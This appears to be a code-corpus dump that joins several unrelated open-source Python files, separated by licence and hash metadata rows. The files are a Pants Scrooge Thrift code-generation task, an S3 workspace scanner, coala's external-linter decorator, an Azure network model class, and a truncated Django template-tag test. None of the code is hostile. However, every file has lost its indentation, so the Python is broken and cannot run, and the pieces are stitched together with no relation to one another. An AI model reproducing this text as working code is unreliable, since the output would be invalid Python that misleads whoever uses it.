cls.register_jvm_tool(register, 'scrooge-gen')
@classmethod
def product_types(cls):
return ['java', 'scala']
def __init__(self, *args, **kwargs):
super(ScroogeGen, self).__init__(*args, **kwargs)
self.defaults = JavaThriftLibrary.Defaults(self.context.config)
@property
def config_section(self):
return _CONFIG_SECTION
# TODO(benjy): Use regular os-located tmpfiles, as we do everywhere else.
def _tempname(self):
# don't assume the user's cwd is buildroot
pants_workdir = self.get_options().pants_workdir
tmp_dir = os.path.join(pants_workdir, 'tmp')
safe_mkdir(tmp_dir)
fd, path = tempfile.mkstemp(dir=tmp_dir, prefix='')
os.close(fd)
return path
def _outdir(self, partial_cmd):
return os.path.join(self.workdir, partial_cmd.relative_outdir)
def execute(self):
targets = self.context.targets()
self._validate_compiler_configs(targets)
gentargets_by_dependee = self.context.dependents(
on_predicate=self.is_gentarget,
from_predicate=lambda t: not self.is_gentarget(t))
dependees_by_gentarget = defaultdict(set)
for dependee, tgts in gentargets_by_dependee.items():
for gentarget in tgts:
dependees_by_gentarget[gentarget].add(dependee)
partial_cmds = defaultdict(set)
gentargets = filter(self.is_gentarget, targets)
for target in gentargets:
language = self.defaults.get_language(target)
rpc_style = self.defaults.get_rpc_style(target)
partial_cmd = self.PartialCmd(
language=language,
rpc_style=rpc_style,
namespace_map=tuple(sorted(target.namespace_map.items()) if target.namespace_map else ()))
partial_cmds[partial_cmd].add(target)
for partial_cmd, tgts in partial_cmds.items():
gen_files_for_source = self.gen(partial_cmd, tgts)
relative_outdir = os.path.relpath(self._outdir(partial_cmd), get_buildroot())
langtarget_by_gentarget = {}
for target in tgts:
dependees = dependees_by_gentarget.get(target, [])
langtarget_by_gentarget[target] = self.createtarget(target, dependees, relative_outdir,
gen_files_for_source)
genmap = self.context.products.get(partial_cmd.language)
for gentarget, langtarget in langtarget_by_gentarget.items():
genmap.add(gentarget, get_buildroot(), [langtarget])
for dep in gentarget.dependencies:
if self.is_gentarget(dep):
langtarget.inject_dependency(langtarget_by_gentarget[dep].address)
def gen(self, partial_cmd, targets):
with self.invalidated(targets, invalidate_dependents=True) as invalidation_check:
invalid_targets = []
for vt in invalidation_check.invalid_vts:
invalid_targets.extend(vt.targets)
import_paths, changed_srcs = calculate_compile_sources(invalid_targets, self.is_gentarget)
outdir = self._outdir(partial_cmd)
if changed_srcs:
args = []
for import_path in import_paths:
args.extend(['--import-path', import_path])
args.extend(['--language', partial_cmd.language])
for lhs, rhs in partial_cmd.namespace_map:
args.extend(['--namespace-map', '%s=%s' % (lhs, rhs)])
if partial_cmd.rpc_style == 'ostrich':
args.append('--finagle')
args.append('--ostrich')
elif partial_cmd.rpc_style == 'finagle':
args.append('--finagle')
args.extend(['--dest', outdir])
safe_mkdir(outdir)
if not self.context.config.getbool(_CONFIG_SECTION, 'strict', default=False):
args.append('--disable-strict')
if self.get_options().verbose:
args.append('--verbose')
gen_file_map_path = os.path.relpath(self._tempname())
args.extend(['--gen-file-map', gen_file_map_path])
args.extend(changed_srcs)
classpath = self.tool_classpath('scrooge-gen')
jvm_options = self.context.config.getlist(_CONFIG_SECTION, 'jvm_options', default=[])
jvm_options.append('-Dfile.encoding=UTF-8')
returncode = self.runjava(classpath=classpath,
main='com.twitter.scrooge.Main',
jvm_options=jvm_options,
args=args,
workunit_name='scrooge-gen')
try:
if 0 == returncode:
gen_files_for_source = self.parse_gen_file_map(gen_file_map_path, outdir)
else:
gen_files_for_source = None
finally:
os.remove(gen_file_map_path)
if 0 != returncode:
raise TaskError('Scrooge compiler exited non-zero ({0})'.format(returncode))
self.write_gen_file_map(gen_files_for_source, invalid_targets, outdir)
return self.gen_file_map(targets, outdir)
def createtarget(self, gentarget, dependees, outdir, gen_files_for_source):
assert self.is_gentarget(gentarget)
def create_target(files, deps, target_type):
spec = '{spec_path}:{name}'.format(spec_path=outdir, name=gentarget.id)
address = SyntheticAddress.parse(spec=spec)
return self.context.add_new_target(address,
target_type,
sources=files,
provides=gentarget.provides,
dependencies=deps,
excludes=gentarget.excludes,
derived_from=gentarget)
def create_geninfo(key):
gen_info = self.context.config.getdict(_CONFIG_SECTION, key,
default={'gen': key,
'deps': {'service': [], 'structs': []}})
gen = gen_info['gen']
deps = dict()
for category, depspecs in gen_info['deps'].items():
dependencies = OrderedSet()
deps[category] = dependencies
for depspec in depspecs:
try:
dependencies.update(self.context.resolve(depspec))
except AddressLookupError as e:
raise self.DepLookupError("{message}\n referenced from [{section}] key: " \
"gen->deps->{category} in pants.ini".format(
message=e,
section=_CONFIG_SECTION,
category=category
))
return self.GenInfo(gen, deps)
return self._inject_target(gentarget, dependees,
create_geninfo(self.defaults.get_language(gentarget)),
gen_files_for_source,
create_target)
def _inject_target(self, target, dependees, geninfo, gen_files_for_source, create_target):
files = []
has_service = False
for source in target.sources_relative_to_buildroot():
services = calculate_services(source)
genfiles = gen_files_for_source[source]
has_service = has_service or services
files.extend(genfiles)
deps = OrderedSet(geninfo.deps['service' if has_service else 'structs'])
deps.update(target.dependencies)
target_type = _TARGET_TYPE_FOR_LANG[self.defaults.get_language(target)]
tgt = create_target(files, deps, target_type)
tgt.add_labels('codegen')
for dependee in dependees:
dependee.inject_dependency(tgt.address)
return tgt
def parse_gen_file_map(self, gen_file_map_path, outdir):
d = defaultdict(set)
with safe_open(gen_file_map_path, 'r') as deps:
for dep in deps:
src, cls = dep.strip().split('->')
src = os.path.relpath(src.strip())
cls = os.path.relpath(cls.strip(), outdir)
d[src].add(cls)
return d
def gen_file_map_path_for_target(self, target, outdir):
return os.path.join(outdir, 'gen-file-map-by-target', target.id)
def gen_file_map_for_target(self, target, outdir):
gen_file_map = self.gen_file_map_path_for_target(target, outdir)
return self.parse_gen_file_map(gen_file_map, outdir)
def gen_file_map(self, targets, outdir):
gen_file_map = defaultdict(set)
for target in targets:
target_gen_file_map = self.gen_file_map_for_target(target, outdir)
gen_file_map.update(target_gen_file_map)
return gen_file_map
def write_gen_file_map_for_target(self, gen_file_map, target, outdir):
def calc_srcs(target):
_, srcs = calculate_compile_sources([target], self.is_gentarget)
return srcs
with safe_open(self.gen_file_map_path_for_target(target, outdir), 'w') as f:
for src in sorted(calc_srcs(target)):
clss = gen_file_map[src]
for cls in sorted(clss):
print('%s -> %s' % (src, os.path.join(outdir, cls)), file=f)
def write_gen_file_map(self, gen_file_map, targets, outdir):
for target in targets:
self.write_gen_file_map_for_target(gen_file_map, target, outdir)
def is_gentarget(self, target):
if not isinstance(target, JavaThriftLibrary):
return False
# We only handle requests for 'scrooge' compilation and not, for example 'thrift', aka the
# Apache thrift compiler
compiler = self.defaults.get_compiler(target)
if compiler != 'scrooge':
return False
language = self.defaults.get_language(target)
if language not in ('scala', 'java'):
raise TaskError('Scrooge can not generate {0}'.format(language))
return True
def _validate_compiler_configs(self, targets):
self._validate(self.defaults, targets)
@staticmethod
def _validate(defaults, targets):
ValidateCompilerConfig = namedtuple('ValidateCompilerConfig', ['language', 'rpc_style'])
def compiler_config(tgt):
# Note compiler is not present in this signature. At this time
# Scrooge and the Apache thrift generators produce identical
# java sources, and the Apache generator does not produce scala
# sources. As there's no permutation allowing the creation of
# incompatible sources with the same language+rpc_style we omit
# the compiler from the signature at this time.
return ValidateCompilerConfig(language=defaults.get_language(tgt),
rpc_style=defaults.get_rpc_style(tgt))
mismatched_compiler_configs = defaultdict(set)
for target in filter(lambda t: isinstance(t, JavaThriftLibrary), targets):
mycompilerconfig = compiler_config(target)
def collect(dep):
if mycompilerconfig != compiler_config(dep):
mismatched_compiler_configs[target].add(dep)
target.walk(collect, predicate=lambda t: isinstance(t, JavaThriftLibrary))
if mismatched_compiler_configs:
msg = ['Thrift dependency trees must be generated with a uniform compiler configuration.\n\n']
for tgt in sorted(mismatched_compiler_configs.keys()):
msg.append('%s - %s\n' % (tgt, compiler_config(tgt)))
for dep in mismatched_compiler_configs[tgt]:
msg.append(' %s - %s\n' % (dep, compiler_config(dep)))
raise TaskError(''.join(msg))
NAMESPACE_PARSER = re.compile(r'^\s*namespace\s+([^\s]+)\s+([^\s]+)\s*$')
TYPE_PARSER = re.compile(r'^\s*(const|enum|exception|service|struct|union)\s+([^\s{]+).*')
# TODO(John Sirois): consolidate thrift parsing to 1 pass instead of 2
def calculate_services(source):
"""Calculates the services generated for the given thrift IDL source.
Returns an interable of services
"""
with open(source, 'r') as thrift:
namespaces = dict()
types = defaultdict(set)
for line in thrift:
match = NAMESPACE_PARSER.match(line)
if match:
lang = match.group(1)
namespace = match.group(2)
namespaces[lang] = namespace
else:
match = TYPE_PARSER.match(line)
if match:
typename = match.group(1)
name = match.group(2)
types[typename].add(name)
return types['service']
| apache-2.0 | -4,411,980,448,864,853,000 | 38.506964 | 100 | 0.636043 | false |
ngageoint/scale | scale/ingest/scan/scanners/s3_scanner.py | 1 | 1707 | """Defines a scanner that scans an S3 bucket backed workspace for files"""
from __future__ import unicode_literals
import logging
from ingest.scan.scanners.scanner import Scanner
logger = logging.getLogger(__name__)
class S3Scanner(Scanner):
"""A scanner for an S3 bucket backed workspace
"""
def __init__(self):
"""Constructor
"""
super(S3Scanner, self).__init__('s3', ['s3'])
def load_configuration(self, configuration):
"""See :meth:`ingest.scan.scanners.scanner.Scanner.load_configuration`
"""
# Nothing to do as all configuration is done at workspace broker level.
pass
def validate_configuration(self, configuration):
"""See :meth:`ingest.scan.scanners.scanner.Scanner.validate_configuration`
"""
# No configuration is required for S3 scanner as everything is provided
# by way of the workspace configurations.
return []
def _ingest_file(self, file_name, file_size):
"""Initiates ingest for a single S3 object
:param file_name: S3 object key
:type file_name: string
:param file_size: object size in bytes
:type file_size: int
:returns: Ingest model prepped for bulk create
:rtype: :class:`ingest.models.Ingest`
"""
ingest = None
if self._dry_run:
logger.info("Scan detected S3 object in workspace '%s': %s" % (self._scanned_workspace.name, file_name))
else:
ingest = self._process_ingest(file_name, file_size)
logger.info("Scan processed S3 object from workspace '%s': %s" % (self._scanned_workspace.name, file_name))
return ingest
| apache-2.0 | -7,532,263,870,549,302,000 | 29.482143 | 119 | 0.630346 | false |
tushar-rishav/coala | coalib/bearlib/abstractions/Linter.py | 1 | 31941 | from contextlib import contextmanager
from functools import partial
import inspect
from itertools import chain, compress
import re
import shutil
from subprocess import check_call, CalledProcessError, DEVNULL
from types import MappingProxyType
from coalib.bears.LocalBear import LocalBear
from coalib.misc.ContextManagers import make_temp
from coala_utils.decorators import assert_right_type, enforce_signature
from coalib.misc.Future import partialmethod
from coalib.misc.Shell import run_shell_command
from coalib.results.Diff import Diff
from coalib.results.Result import Result
from coalib.results.RESULT_SEVERITY import RESULT_SEVERITY
from coalib.settings.FunctionMetadata import FunctionMetadata
def _prepare_options(options):
"""
Prepares options for ``linter`` for a given options dict in-place.
:param options:
The options dict that contains user/developer inputs.
"""
allowed_options = {"executable",
"output_format",
"use_stdin",
"use_stdout",
"use_stderr",
"config_suffix",
"executable_check_fail_info",
"prerequisite_check_command"}
if not options["use_stdout"] and not options["use_stderr"]:
raise ValueError("No output streams provided at all.")
if options["output_format"] == "corrected":
if (
"diff_severity" in options and
options["diff_severity"] not in RESULT_SEVERITY.reverse):
raise TypeError("Invalid value for `diff_severity`: " +
repr(options["diff_severity"]))
if "result_message" in options:
assert_right_type(options["result_message"], str, "result_message")
if "diff_distance" in options:
assert_right_type(options["diff_distance"], int, "diff_distance")
allowed_options |= {"diff_severity", "result_message", "diff_distance"}
elif options["output_format"] == "regex":
if "output_regex" not in options:
raise ValueError("`output_regex` needed when specified "
"output-format 'regex'.")
options["output_regex"] = re.compile(options["output_regex"])
# Don't setup severity_map if one is provided by user or if it's not
# used inside the output_regex. If one is manually provided but not
# used in the output_regex, throw an exception.
if "severity_map" in options:
if "severity" not in options["output_regex"].groupindex:
raise ValueError("Provided `severity_map` but named group "
"`severity` is not used in `output_regex`.")
assert_right_type(options["severity_map"], dict, "severity_map")
for key, value in options["severity_map"].items():
assert_right_type(key, str, "severity_map key")
try:
assert_right_type(value, int, "<severity_map dict-value>")
except TypeError:
raise TypeError(
"The value {!r} for key {!r} inside given "
"severity-map is no valid severity value.".format(
value, key))
if value not in RESULT_SEVERITY.reverse:
raise TypeError(
"Invalid severity value {!r} for key {!r} inside "
"given severity-map.".format(value, key))
# Auto-convert keys to lower-case. This creates automatically a new
# dict which prevents runtime-modifications.
options["severity_map"] = {
key.lower(): value
for key, value in options["severity_map"].items()}
if "result_message" in options:
assert_right_type(options["result_message"], str, "result_message")
allowed_options |= {"output_regex", "severity_map", "result_message"}
elif options["output_format"] is not None:
raise ValueError("Invalid `output_format` specified.")
if options["prerequisite_check_command"]:
if "prerequisite_check_fail_message" in options:
assert_right_type(options["prerequisite_check_fail_message"],
str,
"prerequisite_check_fail_message")
else:
options["prerequisite_check_fail_message"] = (
"Prerequisite check failed.")
allowed_options.add("prerequisite_check_fail_message")
# Check for illegal superfluous options.
superfluous_options = options.keys() - allowed_options
if superfluous_options:
raise ValueError(
"Invalid keyword arguments provided: " +
", ".join(repr(s) for s in sorted(superfluous_options)))
def _create_linter(klass, options):
class LinterMeta(type):
def __repr__(cls):
return "<{} linter class (wrapping {!r})>".format(
cls.__name__, options["executable"])
class LinterBase(LocalBear, metaclass=LinterMeta):
@staticmethod
def generate_config(filename, file):
"""
Generates the content of a config-file the linter-tool might need.
The contents generated from this function are written to a
temporary file and the path is provided inside
``create_arguments()``.
By default no configuration is generated.
You can provide additional keyword arguments and defaults. These
will be interpreted as required settings that need to be provided
through a coafile-section.
:param filename:
The name of the file currently processed.
:param file:
The contents of the file currently processed.
:return:
The config-file-contents as a string or ``None``.
"""
return None
@staticmethod
def create_arguments(filename, file, config_file):
"""
Creates the arguments for the linter.
You can provide additional keyword arguments and defaults. These
will be interpreted as required settings that need to be provided
through a coafile-section.
:param filename:
The name of the file the linter-tool shall process.
:param file:
The contents of the file.
:param config_file:
The path of the config-file if used. ``None`` if unused.
:return:
A sequence of arguments to feed the linter-tool with.
"""
raise NotImplementedError
@staticmethod
def get_executable():
"""
Returns the executable of this class.
:return:
The executable name.
"""
return options["executable"]
@classmethod
def check_prerequisites(cls):
"""
Checks whether the linter-tool the bear uses is operational.
:return:
True if operational, otherwise a string containing more info.
"""
if shutil.which(cls.get_executable()) is None:
return (repr(cls.get_executable()) + " is not installed." +
(" " + options["executable_check_fail_info"]
if options["executable_check_fail_info"] else
""))
else:
if options["prerequisite_check_command"]:
try:
check_call(options["prerequisite_check_command"],
stdout=DEVNULL,
stderr=DEVNULL)
return True
except (OSError, CalledProcessError):
return options["prerequisite_check_fail_message"]
return True
@classmethod
def _get_create_arguments_metadata(cls):
return FunctionMetadata.from_function(
cls.create_arguments,
omit={"self", "filename", "file", "config_file"})
@classmethod
def _get_generate_config_metadata(cls):
return FunctionMetadata.from_function(
cls.generate_config,
omit={"filename", "file"})
@classmethod
def _get_process_output_metadata(cls):
metadata = FunctionMetadata.from_function(cls.process_output)
if options["output_format"] is None:
omitted = {"self", "output", "filename", "file"}
else:
# If a specific output format is provided, function signatures
# from process_output functions should not appear in the help.
omitted = set(chain(metadata.non_optional_params,
metadata.optional_params))
metadata.omit = omitted
return metadata
@classmethod
def get_metadata(cls):
merged_metadata = FunctionMetadata.merge(
cls._get_process_output_metadata(),
cls._get_generate_config_metadata(),
cls._get_create_arguments_metadata())
merged_metadata.desc = inspect.getdoc(cls)
return merged_metadata
def _convert_output_regex_match_to_result(self,
match,
filename,
severity_map,
result_message):
"""
Converts the matched named-groups of ``output_regex`` to an actual
``Result``.
:param match:
The regex match object.
:param filename:
The name of the file this match belongs to.
:param severity_map:
The dict to use to map the severity-match to an actual
``RESULT_SEVERITY``.
:param result_message:
The static message to use for results instead of grabbing it
from the executable output via the ``message`` named regex
group.
"""
# Pre process the groups
groups = match.groupdict()
if 'severity' in groups:
try:
groups["severity"] = severity_map[
groups["severity"].lower()]
except KeyError:
self.warn(
repr(groups["severity"]) + " not found in "
"severity-map. Assuming `RESULT_SEVERITY.NORMAL`.")
groups["severity"] = RESULT_SEVERITY.NORMAL
else:
groups['severity'] = RESULT_SEVERITY.NORMAL
for variable in ("line", "column", "end_line", "end_column"):
groups[variable] = (None
if groups.get(variable, None) is None else
int(groups[variable]))
if "origin" in groups:
groups["origin"] = "{} ({})".format(klass.__name__,
groups["origin"].strip())
# Construct the result.
return Result.from_values(
origin=groups.get("origin", self),
message=(groups.get("message", "").strip()
if result_message is None else result_message),
file=filename,
severity=groups["severity"],
line=groups["line"],
column=groups["column"],
end_line=groups["end_line"],
end_column=groups["end_column"],
additional_info=groups.get("additional_info", "").strip())
def process_output_corrected(self,
output,
filename,
file,
diff_severity=RESULT_SEVERITY.NORMAL,
result_message="Inconsistency found.",
diff_distance=1):
"""
Processes the executable's output as a corrected file.
:param output:
The output of the program. This can be either a single
string or a sequence of strings.
:param filename:
The filename of the file currently being corrected.
:param file:
The contents of the file currently being corrected.
:param diff_severity:
The severity to use for generating results.
:param result_message:
The message to use for generating results.
:param diff_distance:
Number of unchanged lines that are allowed in between two
changed lines so they get yielded as one diff. If a negative
distance is given, every change will be yielded as an own diff,
even if they are right beneath each other.
:return:
An iterator returning results containing patches for the
file to correct.
"""
if isinstance(output, str):
output = (output,)
for string in output:
for diff in Diff.from_string_arrays(
file,
string.splitlines(keepends=True)).split_diff(
distance=diff_distance):
yield Result(self,
result_message,
affected_code=diff.affected_code(filename),
diffs={filename: diff},
severity=diff_severity)
def process_output_regex(
self, output, filename, file, output_regex,
severity_map=MappingProxyType({
"critical": RESULT_SEVERITY.MAJOR,
"c": RESULT_SEVERITY.MAJOR,
"fatal": RESULT_SEVERITY.MAJOR,
"fail": RESULT_SEVERITY.MAJOR,
"f": RESULT_SEVERITY.MAJOR,
"error": RESULT_SEVERITY.MAJOR,
"err": RESULT_SEVERITY.MAJOR,
"e": RESULT_SEVERITY.MAJOR,
"warning": RESULT_SEVERITY.NORMAL,
"warn": RESULT_SEVERITY.NORMAL,
"w": RESULT_SEVERITY.NORMAL,
"information": RESULT_SEVERITY.INFO,
"info": RESULT_SEVERITY.INFO,
"i": RESULT_SEVERITY.INFO,
"suggestion": RESULT_SEVERITY.INFO}),
result_message=None):
"""
Processes the executable's output using a regex.
:param output:
The output of the program. This can be either a single
string or a sequence of strings.
:param filename:
The filename of the file currently being corrected.
:param file:
The contents of the file currently being corrected.
:param output_regex:
The regex to parse the output with. It should use as many
of the following named groups (via ``(?P<name>...)``) to
provide a good result:
- line - The line where the issue starts.
- column - The column where the issue starts.
- end_line - The line where the issue ends.
- end_column - The column where the issue ends.
- severity - The severity of the issue.
- message - The message of the result.
- origin - The origin of the issue.
- additional_info - Additional info provided by the issue.
The groups ``line``, ``column``, ``end_line`` and
``end_column`` don't have to match numbers only, they can
also match nothing, the generated ``Result`` is filled
automatically with ``None`` then for the appropriate
properties.
:param severity_map:
A dict used to map a severity string (captured from the
``output_regex`` with the named group ``severity``) to an
actual ``coalib.results.RESULT_SEVERITY`` for a result.
:param result_message:
The static message to use for results instead of grabbing it
from the executable output via the ``message`` named regex
group.
:return:
An iterator returning results.
"""
if isinstance(output, str):
output = (output,)
for string in output:
for match in re.finditer(output_regex, string):
yield self._convert_output_regex_match_to_result(
match, filename, severity_map=severity_map,
result_message=result_message)
if options["output_format"] is None:
# Check if user supplied a `process_output` override.
if not callable(getattr(klass, "process_output", None)):
raise ValueError("`process_output` not provided by given "
"class {!r}.".format(klass.__name__))
# No need to assign to `process_output` here, the class mixing
# below automatically does that.
else:
# Prevent people from accidentally defining `process_output`
# manually, as this would implicitly override the internally
# set-up `process_output`.
if hasattr(klass, "process_output"):
raise ValueError("Found `process_output` already defined "
"by class {!r}, but {!r} output-format is "
"specified.".format(klass.__name__,
options["output_format"]))
if options["output_format"] == "corrected":
process_output_args = {
key: options[key]
for key in ("result_message", "diff_severity",
"diff_distance")
if key in options}
process_output = partialmethod(
process_output_corrected, **process_output_args)
else:
assert options["output_format"] == "regex"
process_output_args = {
key: options[key]
for key in ("output_regex", "severity_map",
"result_message")
if key in options}
process_output = partialmethod(
process_output_regex, **process_output_args)
@classmethod
@contextmanager
def _create_config(cls, filename, file, **kwargs):
"""
Provides a context-manager that creates the config file if the
user provides one and cleans it up when done with linting.
:param filename:
The filename of the file.
:param file:
The file contents.
:param kwargs:
Section settings passed from ``run()``.
:return:
A context-manager handling the config-file.
"""
content = cls.generate_config(filename, file, **kwargs)
if content is None:
yield None
else:
with make_temp(
suffix=options["config_suffix"]) as config_file:
with open(config_file, mode="w") as fl:
fl.write(content)
yield config_file
def run(self, filename, file, **kwargs):
# Get the **kwargs params to forward to `generate_config()`
# (from `_create_config()`).
generate_config_kwargs = FunctionMetadata.filter_parameters(
self._get_generate_config_metadata(), kwargs)
with self._create_config(
filename,
file,
**generate_config_kwargs) as config_file:
# And now retrieve the **kwargs for `create_arguments()`.
create_arguments_kwargs = (
FunctionMetadata.filter_parameters(
self._get_create_arguments_metadata(), kwargs))
args = self.create_arguments(filename, file, config_file,
**create_arguments_kwargs)
try:
args = tuple(args)
except TypeError:
self.err("The given arguments "
"{!r} are not iterable.".format(args))
return
arguments = (self.get_executable(),) + args
self.debug("Running '{}'".format(' '.join(arguments)))
output = run_shell_command(
arguments,
stdin="".join(file) if options["use_stdin"] else None)
output = tuple(compress(
output,
(options["use_stdout"], options["use_stderr"])))
if len(output) == 1:
output = output[0]
process_output_kwargs = FunctionMetadata.filter_parameters(
self._get_process_output_metadata(), kwargs)
return self.process_output(output, filename, file,
**process_output_kwargs)
def __repr__(self):
return "<{} linter object (wrapping {!r}) at {}>".format(
type(self).__name__, self.get_executable(), hex(id(self)))
# Mixin the linter into the user-defined interface, otherwise
# `create_arguments` and other methods would be overridden by the
# default version.
result_klass = type(klass.__name__, (klass, LinterBase), {})
result_klass.__doc__ = klass.__doc__ if klass.__doc__ else ""
return result_klass
@enforce_signature
def linter(executable: str,
use_stdin: bool=False,
use_stdout: bool=True,
use_stderr: bool=False,
config_suffix: str="",
executable_check_fail_info: str="",
prerequisite_check_command: tuple=(),
output_format: (str, None)=None,
**options):
"""
Decorator that creates a ``LocalBear`` that is able to process results from
an external linter tool.
The main functionality is achieved through the ``create_arguments()``
function that constructs the command-line-arguments that get parsed to your
executable.
>>> @linter("xlint", output_format="regex", output_regex="...")
... class XLintBear:
... @staticmethod
... def create_arguments(filename, file, config_file):
... return "--lint", filename
Requiring settings is possible like in ``Bear.run()`` with supplying
additional keyword arguments (and if needed with defaults).
>>> @linter("xlint", output_format="regex", output_regex="...")
... class XLintBear:
... @staticmethod
... def create_arguments(filename,
... file,
... config_file,
... lintmode: str,
... enable_aggressive_lints: bool=False):
... arguments = ("--lint", filename, "--mode=" + lintmode)
... if enable_aggressive_lints:
... arguments += ("--aggressive",)
... return arguments
Sometimes your tool requires an actual file that contains configuration.
``linter`` allows you to just define the contents the configuration shall
contain via ``generate_config()`` and handles everything else for you.
>>> @linter("xlint", output_format="regex", output_regex="...")
... class XLintBear:
... @staticmethod
... def generate_config(filename,
... file,
... lintmode,
... enable_aggressive_lints):
... modestring = ("aggressive"
... if enable_aggressive_lints else
... "non-aggressive")
... contents = ("<xlint>",
... " <mode>" + lintmode + "</mode>",
... " <aggressive>" + modestring + "</aggressive>",
... "</xlint>")
... return "\\n".join(contents)
...
... @staticmethod
... def create_arguments(filename,
... file,
... config_file):
... return "--lint", filename, "--config", config_file
As you can see you don't need to copy additional keyword-arguments you
introduced from ``create_arguments()`` to ``generate_config()`` and
vice-versa. ``linter`` takes care of forwarding the right arguments to the
right place, so you are able to avoid signature duplication.
If you override ``process_output``, you have the same feature like above
(auto-forwarding of the right arguments defined in your function
signature).
Note when overriding ``process_output``: Providing a single output stream
(via ``use_stdout`` or ``use_stderr``) puts the according string attained
from the stream into parameter ``output``, providing both output streams
inputs a tuple with ``(stdout, stderr)``. Providing ``use_stdout=False``
and ``use_stderr=False`` raises a ``ValueError``. By default ``use_stdout``
is ``True`` and ``use_stderr`` is ``False``.
Documentation:
Bear description shall be provided at class level.
If you document your additional parameters inside ``create_arguments``,
``generate_config`` and ``process_output``, beware that conflicting
documentation between them may be overridden. Document duplicated
parameters inside ``create_arguments`` first, then in ``generate_config``
and after that inside ``process_output``.
For the tutorial see:
http://coala.readthedocs.org/en/latest/Users/Tutorials/Linter_Bears.html
:param executable:
The linter tool.
:param use_stdin:
Whether the input file is sent via stdin instead of passing it over the
command-line-interface.
:param use_stdout:
Whether to use the stdout output stream.
:param use_stderr:
Whether to use the stderr output stream.
:param config_suffix:
The suffix-string to append to the filename of the configuration file
created when ``generate_config`` is supplied. Useful if your executable
expects getting a specific file-type with specific file-ending for the
configuration file.
:param executable_check_fail_info:
Information that is provided together with the fail message from the
normal executable check. By default no additional info is printed.
:param prerequisite_check_command:
A custom command to check for when ``check_prerequisites`` gets
invoked (via ``subprocess.check_call()``). Must be an ``Iterable``.
:param prerequisite_check_fail_message:
A custom message that gets displayed when ``check_prerequisites``
fails while invoking ``prerequisite_check_command``. Can only be
provided together with ``prerequisite_check_command``.
:param output_format:
The output format of the underlying executable. Valid values are
- ``None``: Define your own format by overriding ``process_output``.
Overriding ``process_output`` is then mandatory, not specifying it
raises a ``ValueError``.
- ``'regex'``: Parse output using a regex. See parameter
``output_regex``.
- ``'corrected'``: The output is the corrected of the given file. Diffs
are then generated to supply patches for results.
Passing something else raises a ``ValueError``.
:param output_regex:
The regex expression as a string that is used to parse the output
generated by the underlying executable. It should use as many of the
following named groups (via ``(?P<name>...)``) to provide a good
result:
- line - The line where the issue starts.
- column - The column where the issue starts.
- end_line - The line where the issue ends.
- end_column - The column where the issue ends.
- severity - The severity of the issue.
- message - The message of the result.
- origin - The origin of the issue.
- additional_info - Additional info provided by the issue.
The groups ``line``, ``column``, ``end_line`` and ``end_column`` don't
have to match numbers only, they can also match nothing, the generated
``Result`` is filled automatically with ``None`` then for the
appropriate properties.
Needs to be provided if ``output_format`` is ``'regex'``.
:param severity_map:
A dict used to map a severity string (captured from the
``output_regex`` with the named group ``severity``) to an actual
``coalib.results.RESULT_SEVERITY`` for a result. Severity strings are
mapped **case-insensitive**!
- ``RESULT_SEVERITY.MAJOR``: Mapped by ``error``.
- ``RESULT_SEVERITY.NORMAL``: Mapped by ``warning`` or ``warn``.
- ``RESULT_SEVERITY.MINOR``: Mapped by ``info``.
A ``ValueError`` is raised when the named group ``severity`` is not
used inside ``output_regex`` and this parameter is given.
:param diff_severity:
The severity to use for all results if ``output_format`` is
``'corrected'``. By default this value is
``coalib.results.RESULT_SEVERITY.NORMAL``. The given value needs to be
defined inside ``coalib.results.RESULT_SEVERITY``.
:param result_message:
The message-string to use for all results. Can be used only together
with ``corrected`` or ``regex`` output format. When using
``corrected``, the default value is ``"Inconsistency found."``, while
for ``regex`` this static message is disabled and the message matched
by ``output_regex`` is used instead.
:param diff_distance:
Number of unchanged lines that are allowed in between two changed lines
so they get yielded as one diff if ``corrected`` output-format is
given. If a negative distance is given, every change will be yielded as
an own diff, even if they are right beneath each other. By default this
value is ``1``.
:raises ValueError:
Raised when invalid options are supplied.
:raises TypeError:
Raised when incompatible types are supplied.
See parameter documentations for allowed types.
:return:
A ``LocalBear`` derivation that lints code using an external tool.
"""
options["executable"] = executable
options["output_format"] = output_format
options["use_stdin"] = use_stdin
options["use_stdout"] = use_stdout
options["use_stderr"] = use_stderr
options["config_suffix"] = config_suffix
options["executable_check_fail_info"] = executable_check_fail_info
options["prerequisite_check_command"] = prerequisite_check_command
_prepare_options(options)
return partial(_create_linter, options=options)
| agpl-3.0 | -2,417,693,380,399,300,600 | 42.814815 | 79 | 0.549544 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_03_01/models/topology_association.py | 1 | 1586 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TopologyAssociation(Model):
"""Resources that have an association with the parent resource.
:param name: The name of the resource that is associated with the parent
resource.
:type name: str
:param resource_id: The ID of the resource that is associated with the
parent resource.
:type resource_id: str
:param association_type: The association type of the child resource to the
parent resource. Possible values include: 'Associated', 'Contains'
:type association_type: str or
~azure.mgmt.network.v2017_03_01.models.AssociationType
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'association_type': {'key': 'associationType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(TopologyAssociation, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.resource_id = kwargs.get('resource_id', None)
self.association_type = kwargs.get('association_type', None)
| mit | -3,703,639,473,381,361,700 | 38.65 | 78 | 0.612863 | false |
ychab/mymoney | mymoney/core/tests/test_templatetags.py | 1 | 12142 | import unittest
from decimal import Decimal
from unittest import mock
from django.test import SimpleTestCase
from django.urls import reverse
from django.utils.safestring import SafeText
from django_webtest import WebTest
from mymoney.apps.bankaccounts.factories import BankAccountFactory
from mymoney.apps.banktransactions.factories import BankTransactionFactory
from mymoney.apps.banktransactions.models import BankTransaction
from ..factories import UserFactory
from ..templatetags.core_tags import (
breadcrumb, currency_positive, display_messages, form_errors_exists,
language_to_upper, localize_positive, localize_positive_color,
merge_form_errors, payment_method,
)
class TemplateTagsTestCase(unittest.TestCase):
def test_display_messages(self):
msgs = [
mock.Mock(tags='success'),
mock.Mock(tags='error'),
mock.Mock(tags='debug'),
mock.Mock(tags=None),
]
context = display_messages(msgs)
i = 0
for msg in context['messages']:
if i == 0:
self.assertEqual(msg.type, 'success')
elif i == 1:
self.assertEqual(msg.type, 'danger')
elif i == 2:
